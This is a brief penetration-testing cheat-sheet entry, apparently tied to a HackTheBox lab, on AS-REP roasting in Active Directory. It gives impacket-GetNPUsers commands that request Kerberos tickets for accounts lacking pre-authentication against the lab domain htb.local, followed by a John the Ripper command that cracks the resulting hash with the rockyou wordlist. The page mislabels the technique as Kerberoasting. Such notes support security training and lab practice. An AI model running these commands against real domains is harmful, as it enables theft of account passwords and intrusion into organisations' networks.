AS-REP Roast (Kerberoasting)
Find Users that don't use Pre-Authentication and fetch TGT
impacket-GetNPUsers -request -dc-ip 10.10.10.161 htb.local/
# OR, If we know the username:
impacket-GetNPUsers -dc-ip 10.10.10.161 htb.local/svc-alfresco -no-passCrack the TGT hash using John
john hash --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txtLast updated